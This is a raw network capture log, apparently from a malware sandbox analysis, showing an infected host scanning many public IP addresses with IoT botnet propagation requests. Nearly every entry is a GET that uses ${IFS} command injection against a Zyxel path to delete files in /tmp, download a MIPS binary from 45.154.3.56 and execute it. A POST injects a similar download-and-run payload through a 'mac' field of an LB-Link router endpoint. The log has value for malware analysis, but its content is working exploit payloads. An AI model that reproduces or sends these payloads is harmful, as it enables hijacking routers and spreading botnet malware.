                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:28.052514076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1096192.168.2.145673693.46.151.213443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:28.052550077 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1097192.168.2.1437040171.208.14.105443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:28.052751064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1098192.168.2.143478670.229.216.0443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:28.052854061 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1099192.168.2.143868650.153.9.79443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:29.057679892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1100192.168.2.14438905.157.38.202443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:29.057734013 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1101192.168.2.1450148122.168.121.204443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:29.057795048 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1102192.168.2.1456084159.4.27.202443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:29.057846069 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1103192.168.2.1445298212.193.241.220443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:29.057883024 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1104192.168.2.145590465.112.222.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:29.058031082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1105192.168.2.1442940104.25.69.1998080
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:30.055366993 CET190OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                        Cookie: user=admin
                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 34 2e 33 2e 35 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.154.3.56/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                        Mar 12, 2024 08:50:30.142246008 CET328INHTTP/1.1 400 Bad Request
                        Server: cloudflare
                        Date: Tue, 12 Mar 2024 07:50:30 GMT
                        Content-Type: text/html
                        Content-Length: 155
                        Connection: close
                        CF-RAY: -
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination Port
                        1106192.168.2.14495585.225.247.165443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:30.062377930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1107192.168.2.1446258126.11.61.238443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:30.062428951 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1108192.168.2.1452780166.104.95.206443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:30.062467098 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1109192.168.2.14402881.212.64.83443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:30.062557936 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1110192.168.2.145905271.212.19.68443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:30.062588930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1111192.168.2.1456918156.248.10.78443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:30.062638998 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1112192.168.2.1457358133.253.252.127443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071182966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1113192.168.2.1435032213.216.19.33443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071219921 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1114192.168.2.1452628108.123.88.224443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071268082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1115192.168.2.143357296.165.46.153443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071331024 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1116192.168.2.143403285.120.101.175443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071365118 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1117192.168.2.1433936151.189.43.193443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071400881 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1118192.168.2.144017489.245.168.96443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071446896 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1119192.168.2.143533243.47.192.184443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071484089 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1120192.168.2.144257646.167.237.6443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071527004 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1121192.168.2.14603264.250.42.71443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071574926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1122192.168.2.146054472.146.98.126443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071608067 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1123192.168.2.1443742157.189.101.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071640015 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1124192.168.2.1447424206.36.195.161443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071691990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1125192.168.2.14552784.114.164.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071742058 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1126192.168.2.1438310108.211.229.125443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071810961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1127192.168.2.145304085.218.19.82443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071857929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1128192.168.2.1442316220.232.162.172443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071896076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1129192.168.2.1451660211.134.73.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.071930885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1130192.168.2.1455572158.240.180.231443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072015047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1131192.168.2.146075851.26.248.21443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072041988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1132192.168.2.144388853.247.57.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072089911 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1133192.168.2.1433480151.59.145.73443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072134018 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1134192.168.2.143935864.152.217.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072175026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1135192.168.2.143784450.115.41.28443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072208881 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1136192.168.2.1458986193.77.217.176443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072259903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1137192.168.2.143652689.6.225.115443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072310925 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1138192.168.2.1446370178.81.124.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072360039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1139192.168.2.1434194216.132.239.174443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072397947 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1140192.168.2.1459700197.255.124.3443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072438955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1141192.168.2.144796819.248.101.96443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072496891 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1142192.168.2.1445040141.70.241.216443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072527885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1143192.168.2.1457364190.55.206.84443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072567940 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1144192.168.2.143470043.77.25.136443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072619915 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1145192.168.2.1447356128.174.160.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072669983 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1146192.168.2.1441086213.82.51.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072700977 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1147192.168.2.144904212.44.129.132443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072726965 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1148192.168.2.1434144156.55.91.207443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072772026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1149192.168.2.143473650.183.129.244443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072819948 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1150192.168.2.146048657.214.107.21443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072859049 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1151192.168.2.1442720108.76.86.253443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072909117 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1152192.168.2.1458072185.129.40.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.072958946 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1153192.168.2.1453786119.101.18.30443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073016882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1154192.168.2.1453582157.62.110.47443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073070049 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1155192.168.2.1447844126.11.38.223443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073097944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1156192.168.2.145285423.238.123.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073122025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1157192.168.2.143685298.162.120.195443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073174953 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1158192.168.2.1436828191.80.175.208443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073215008 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1159192.168.2.1460102179.38.108.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073261023 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1160192.168.2.1448754165.50.166.88443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:31.073281050 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
